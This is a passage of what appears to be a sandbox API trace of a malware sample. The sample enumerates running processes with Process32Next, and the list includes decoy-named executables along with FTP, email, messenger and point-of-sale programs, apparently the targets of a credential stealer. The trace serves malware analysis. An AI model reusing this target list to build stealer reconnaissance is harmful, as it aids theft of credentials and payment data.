lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.545] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.547] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.549] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.550] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.551] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.554] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.556] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.558] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.559] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.561] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.562] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.564] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.565] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.566] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.568] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.569] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.571] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.572] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.574] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0215.616] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0215.618] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.621] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.622] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.624] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0215.625] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.627] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.628] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.630] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0215.632] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0215.633] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0215.635] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0215.637] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0215.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0215.639] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0215.641] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0215.642] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0215.644] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0215.645] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0215.647] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0215.648] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0215.650] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0215.725] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0215.727] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0215.728] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0215.730] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0215.731] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0215.733] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0215.735] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0215.737] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0215.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.745] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.751] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.753] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.755] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.757] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.759] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.809] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.819] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.821] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.823] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.827] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.829] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.831] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.833] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.835] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.837] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.839] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.841] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.842] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.844] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.846] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.851] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.853] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.855] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.902] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: 